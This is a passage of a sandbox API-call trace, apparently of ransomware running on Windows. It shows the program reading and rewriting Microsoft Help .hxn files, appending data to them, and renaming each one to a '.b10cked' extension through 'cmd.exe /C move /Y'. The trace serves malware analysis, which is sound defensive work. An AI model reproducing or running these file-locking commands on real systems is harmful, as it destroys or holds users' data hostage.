lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x152 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.582] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0198.583] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.583] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0198.583] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0198.584] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xa8, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xa8, lpOverlapped=0x0) returned 1 [0198.584] SetFilePointer (in: hFile=0x120, lDistanceToMove=-168, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xaa [0198.584] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xa8, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xa8, lpOverlapped=0x0) returned 1 [0198.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OUTLOOK.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0198.588] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OUTLOOK.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1328794, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.OUTLOOK.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0198.588] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x152 [0198.588] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0198.588] CloseHandle (hObject=0x120) returned 1 [0198.648] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN") returned 0x27 [0198.649] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0198.649] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe20, dwThreadId=0xeac)) returned 1 [0198.662] CloseHandle (hObject=0x1b4) returned 1 [0198.662] CloseHandle (hObject=0x120) returned 1 [0198.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.662] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.662] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.662] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.662] ReleaseMutex (hMutex=0xf8) returned 1 [0198.662] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.662] ReleaseMutex (hMutex=0xf8) returned 1 [0198.662] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.663] ReleaseMutex (hMutex=0xf8) returned 1 [0198.663] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.663] ReleaseMutex (hMutex=0xf8) returned 1 [0198.663] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.663] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25545222994) returned 1 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x16a [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.663] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x16a [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x16a [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.664] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x16a [0198.665] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0198.665] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.665] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xb4, lpOverlapped=0x0) returned 1 [0198.666] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0198.666] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xb4, lpOverlapped=0x0) returned 1 [0198.666] SetFilePointer (in: hFile=0x120, lDistanceToMove=-180, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb6 [0198.666] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xb4, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xb4, lpOverlapped=0x0) returned 1 [0198.666] SetFilePointer (in: hFile=0x120, lDistanceToMove=-180, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb6 [0198.666] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xb4, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xb4, lpOverlapped=0x0) returned 1 [0198.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OUTLOOK.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0198.670] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OUTLOOK.DEV.14.1033.hxn", cchWideChar=26, lpMultiByteStr=0x132f75c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.OUTLOOK.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 26 [0198.670] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x16a [0198.670] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0198.670] CloseHandle (hObject=0x120) returned 1 [0198.681] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN") returned 0x27 [0198.681] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0198.683] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.DEV.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSOUTL~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OUTLOOK.DEV.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xf50, dwThreadId=0xe4c)) returned 1 [0198.688] CloseHandle (hObject=0x1b4) returned 1 [0198.688] CloseHandle (hObject=0x120) returned 1 [0198.688] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.688] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0198.688] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0198.688] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.688] ReleaseMutex (hMutex=0xf8) returned 1 [0198.688] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.688] ReleaseMutex (hMutex=0xf8) returned 1 [0198.688] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.688] ReleaseMutex (hMutex=0xf8) returned 1 [0198.688] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0198.688] ReleaseMutex (hMutex=0xf8) returned 1 [0198.688] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.741] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25553033669) returned 1 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.741] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x158 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x158 [0198.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 